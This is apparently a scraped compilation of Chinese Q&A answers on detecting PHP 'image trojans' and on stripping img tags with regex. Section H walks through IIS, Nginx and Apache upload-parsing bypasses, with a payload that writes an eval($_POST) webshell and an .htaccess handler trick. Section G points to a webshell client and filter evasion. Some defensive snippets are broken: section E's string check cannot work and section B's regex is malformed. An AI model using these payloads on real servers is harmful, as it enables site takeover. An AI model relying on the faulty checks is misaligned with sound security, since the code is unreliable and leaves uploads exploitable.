A. 求一個可以檢測PHP圖片木馬的方法!!! - 技術問答
你說的應該是網站IIS上傳漏洞吧?在.jpg圖片格式前,加上.asp或是php,由於程序對他對其格式的判斷不嚴格所以它可以上傳!這個上傳的網頁木馬一旦上傳成功!通過這個小馬,可以在上傳一份大馬!然後直接可以獲得網站最高許可權!可以將自己的網頁程序升級到最新,因為這個上傳漏洞比較早了!還可以取消上傳功能!
B. 求一段php過濾字元串內所有img標簽的代碼
<?php
$a="哈哈哈<imgsrc='img.jpg'/>嘻嘻嘻<imgsrc='img.jpg'/>";
$a=preg_replace('/<img.*?/>/','',$a);
echo$a;
?>
C. php截取摘要時如何過濾圖片
php 字元截取與圖片過濾函數
本文章免費為各位朋友提供一款哦,如果你喜歡的話不防進來看看這款圖片過濾正則表達試
function msubstr($str, $start, $len) {
$tmpstr = "";
$strlen = $start + $len;
for($i = 0; $i < $strlen; $i++) {
if(ord(substr($str, $i, 1)) > 0xa0) {
$tmpstr .= substr($str, $i, 2);
$i++;
} else
$tmpstr .= substr($str, $i, 1);
}
return $tmpstr;
}
//過濾圖片
function img_empty($content){
$content=eregi_replace("<IMG ([a-zA-Z0-9~!& ?:"/._#=~&%]+)>","",$content);
return $content;
}
D. php如何過濾img標簽中的on.....事件
據我的測試,%(<img[^>]*)(on[a-zA-Z]+)=%si可以匹配你給出的示例。
你可以給出不匹配的例子,再進行完善。
或者可以試試以下的正則:
%<img .*? [onload|onclick].+/>%si
E. php 防偽裝成jpg格式的php木馬文件
讀取文件
$data=readfile(xxx.jpg);
if((strpos($data,"php"))== -1){
echo "安全";
}else{
echo "文件中包含php字元,這不是一個圖形文件";
}
F. php 上傳文件但可以防圖片木馬
樓上的真厲害...包含PHP的就判斷是病毒...我也是服了....
圖片木馬只是外行人的稱呼,試問就算你上傳了一個病毒,可是它會自運行嗎?它運行的前提是必須經過事件機制觸發它才能運行。你用滑鼠雙機打開就是一個事件機制。
而web上所說的木馬其實是一個PHP或asp。。之類的文件,觸發它的前提是php解釋器執行該文件。
這里以apache為例,判斷用戶請求的頁面mine是php 就調用php去編譯執行該文件,如果是jpg就直接返回給用戶下載。
所以你只要判斷文件的後綴是否圖片格式(jpg,png,gif...)的就可以了,然後上傳成功就把它改名,最後再添加(.jpg,png,gif)的後綴
G. php一句話木馬上傳時<php被過濾了要怎麼破
現在一般性的一句話都會被攔截,各家IDC都使用了較全面的AI學習和特徵庫,你可以看這篇文章就清楚了:那些強悍的PHP一句話後門,另外推薦一個最新的:「冰蠍」動態二進制加密網站管理客戶端,WebShell工具
H. 怎麼樣調用php圖片木馬
利用解析漏洞
一、IIS 5.x/6.0解析漏洞
IIS 6.0解析利用方法有兩種
1.目錄解析
/xx.asp/xx.jpg
2.文件解析
wooyun.asp;.jpg
第一種,在網站下建立文件夾的名字為 .asp、.asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來解析並執行。
例如創建目錄 wooyun.asp,那麼
/wooyun.asp/1.jpg
將被當作asp文件來執行。假設黑闊可以控制上傳文件夾路徑,就可以不管你上傳後你的圖片改不改名都能拿shell了。
第二種,在IIS6.0下,分號後面的不被解析,也就是說
wooyun.asp;.jpg
會被伺服器看成是wooyun.asp還有IIS6.0 默認的可執行文件除了asp還包含這三種
/wooyun.asa
/wooyun.cer
/wooyun.cdx
二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞
Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…
在默認Fast-CGI開啟狀況下,黑闊上傳一個名字為wooyun.jpg,內容為
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然後訪問wooyun.jpg/.php,在這個目錄下就會生成一句話木馬 shell.php
三、Nginx <8.03 空位元組代碼執行漏洞
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然後通過訪問
xxx.jpg%00.php
來執行其中的代碼
四、Apache解析漏洞
Apache 是從右到左開始判斷解析,如果為不可識別解析,就再往左判斷.
比如 wooyun.php.owf.rar 「.owf」和」.rar」 這兩種後綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.
如何判斷是不是合法的後綴就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見後綴都寫上…)去測試是否是合法後綴
五、其他
在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,黑客可以通過抓包,在文件名後加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。
如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入:
<FilesMatch "wooyun.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然後再上傳shell.jpg的木馬, 這樣shell.jpg就可解析為php文件
I. php 文章需要過濾掉img標簽
PHP的preg_replace函數是 執行一個正則表達式的搜索和替換
語法
1:preg_replace (pattern ,replacement ,subject,limit,count )
參數
描述
pattern 正則表達式(字元串或字元串數組)
replacement 用於替換的字元串或字元串數組
subject 要進行搜索和替換的字元串或字元串數組。
limit 可選。每個模式在每個subject上進行替換的最大次數。默認是 -1(無限)。
cout 可選。完成的替換次數
示例:
<?php//把heigth高度屬性刪除,並添加width="100%"
$str='<div><p>12312321</p><imgsrc="xx.jpg"height="213"/><span>111</span><imgsrc="xz.jpg"/></div>';
$str=preg_replace("/height="[0-9]+?"/","",$str);
$str1=preg_replace("/src="(.+?)"/","src="$1"width="100%"",$str);
print_r($str1);
?>
J. PHP 正則過濾圖片的代碼
$oldhtml = "<div><span><img src=\"11\" />111111<img src=\"33\" /><img src=\"22\" /></span></div>";
$pattern = "#<img[^復>]+>#";
$html = preg_replace ($pattern , "" , $oldhtml);
輸出的制結果就替換掉所有圖片了